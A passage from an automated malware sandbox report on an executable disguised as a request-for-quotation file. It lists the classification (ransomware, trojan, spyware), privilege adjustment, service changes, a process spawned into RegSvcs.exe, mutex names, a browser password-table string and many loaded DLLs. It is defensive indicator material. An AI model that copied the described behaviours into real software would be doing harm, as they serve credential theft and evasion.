dwDeviceNumber, pCurPtnEx->PartitionNumber, FALSE, ARRAY_COUNT_PARAM(wszDevicePath) )\\?\GLOBALROOTAsrpGetMorePartitionInfo( pStorageDeviceNumber->DeviceNumber, pDriveLayoutEx, &pPartitionTable )AsrpInitSystemInformationGetFileSytemType( wszFsName, &pPartitionTable[dwIndex].FileSystemType )AsrpGetDiskLayoutPROCESSOR_ARCHITECTUREERROR_BAD_ENVIRONMENTpSystemInfopSystemInfo->PlatformpSystemInfo->BootSysDirectorypSystemInfo->SystemPathERROR_NOT_SUPPORTEDpSystemInfo->BootWinDirectory::StringCchPrintf(ARRAY_COUNT_PARAM(wszErrorCodeString), L"0x%x", dwError)::StringCchPrintf(ARRAY_COUNT_PARAM(wszDeviceNumber), L"%d", pStorageDeviceNumber->DeviceNumber)DiskListPopulateLayoutInfo0x%xERROR_IO_DEVICEpDiDetailDiskListInitializehdevInfopNewDisk->DevicePath::StringCchCopy(pNewDisk->DevicePath, cchDevicePath, pDiDetail->DevicePath)fResultpNewDisk::StringCchCopyN( ARRAY_COUNT_PARAM(wszDevicePath), pwszVolGuid, ASR_CCH_DEVICE_PATH_FORMAT)VSS_E_CRITICAL_VOLUME_ON_INVALID_DISKAsrpMarkCriticalDiskspfCriticalDiskTableppmwszCriticalVolumeListMwszStringAppend( &mwszCurrentCriticalVolList, pwszCurVolume )ERROR_DEV_NOT_EXISTAsrpMarkCriticalPartitionsMwszStringAppend( &mwszFinalCriticalVolList, pwszCurVolume )MwszStringAppend( &mwszMoreCriticalVolList, pVirtualDiskInfo->m_rgVhdFileInfo[iVhd].m_wszVolumeUniqueName )MwszStringAppend( ppmwszCriticalVolumeList, pwszCurVolume )AsrpIsSupportedConfigurationARM64IA64
Source: Acrobat.exe.1.dr	Binary string: \\.\ko.%x.%x.%xSoftware\Classes\CLSID\{054AAE20-4BEA-4347-8A35-64A533254A9D}\LocalServer320123456789abcdef\Device\HarddiskVolume
Source: Acrobat.exe.1.dr	Binary string: sbox_alternate_desktop_local_winstation_\??\\\?\\??\pipe\\??\mailslot\\/?/?\\Device\
Source: WBEngine.0.etl.23.dr	Binary string: \\?\GLOBALROOT\Device\HarddiskVolume1\v
Source: VSSVC.exe.1.dr	Binary string: EnablePrivilegeLogEventdwLastErrorpIoctlOutputBufferpDriveLayoutDiskTraceDriveLayoutGetDriveTypeByHandlepuiDriveTypeOutSafeStrConvertGuidString(&pDriveLayoutEx->Gpt.DiskId, ARRAY_COUNT_PARAM(wszGuidString))SafeStrConvertGuidString(&pPartitionInfo->Gpt.PartitionId, ARRAY_COUNT_PARAM(wszGuidString))DiskBuildDevicePartitionPath::NtQueryVolumeInformationFile( hDisk, &IoStatusBlock, &DeviceInfo,sizeof(DeviceInfo), FileFsDeviceInformation)DiskForceDriversSyncppwszSignatureOutpwszDevicePathOut%s\Device\Harddisk%d\Partition%dpwszSignature::StringCchPrintf(pwszSignature, cchSignature, L"0x%x", pDriveLayout->Mbr.Signature)
Source: VSSVC.exe.1.dr	Binary string: pPackIdpAsrSysAsrLdm::InitializeForBackupDevicePathToWin32Path(DD_VOLMGR_CONTROL_DEVICE_NAME, ARRAY_COUNT_PARAM(wszVolMgmtCtlPath))\Device\VolMgrControlpPackListDoVdsIoctlCall(hVdsDriver, IOCTL_VOLMGR_ENUM_PACKS, NULL, 0, (void **)&pOutBuffer)hrpwszXmlDocE_FAILE_OUTOFMEMORYNumPacksAsrLdmpXmlDocDynPackpTopNodeAsrLdm::BuildXmlNodesAsrSifERROR_NOT_FOUNDSystempwszXmlFilenameAsrWriteXmlToSifFileERROR_BAD_FORMAT/_o

Source: classification engine

Classification label: mal100.rans.spre.troj.spyw.expl.evad.winEXE@20/157@24/13

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_0046A06A GetLastError,FormatMessageW,

0_2_0046A06A

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,		0_2_004581CB
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_004587E1

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0046B333

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0047EE0D

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0046C397

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00404E89

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_00B0CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00B0CBD0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

File created: C:\Users\user\AppData\Roaming\713f49886881eab5.bin

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-713f49886881eab59ea72c54-b
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-713f49886881eab5-inf
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-713f49886881eab57d8e3ee9-b

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

File created: C:\Users\user\AppData\Local\Temp\autB16B.tmp

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: RegSvcs.exe, 00000002.00000002.2961862883.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2961862883.0000000002B34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2961862883.0000000002B25000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: REQUEST FOR QUOTATION 1307-RFQ.exe

ReversingLabs: Detection: 81%

Source: unknown	Process created: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe "C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknown	Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: unknown	Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
Source: unknown	Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: unknown	Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown	Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown	Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
Source: unknown	Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
Source: unknown	Process created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
Source: unknown	Process created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
Source: unknown	Process created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
Source: unknown	Process created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
Source: unknown	Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
Source: unknown	Process created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe"	Jump to behavior

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: tapi32.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: credui.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxstiff.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxsresm.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ualapi.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtctm.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcprx.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtclog.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxclu.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: clusapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: xolehlp.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxclu.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: clusapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: comres.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcvsp1res.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxoci.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: oci.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: hid.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mfplat.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: rtworkq.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.devices.perception.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mediafoundation.defaultperceptionprovider.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: structuredquery.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: icu.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mswb7.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: spectrumsyncclient.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: perceptionsimulationextensions.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: hid.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: holographicruntimes.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: perceptiondevice.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: spatialstore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: esent.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: analogcommonproxystub.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: structuredquery.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: icu.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: mswb7.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: libcrypto.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: dnsapi.dll
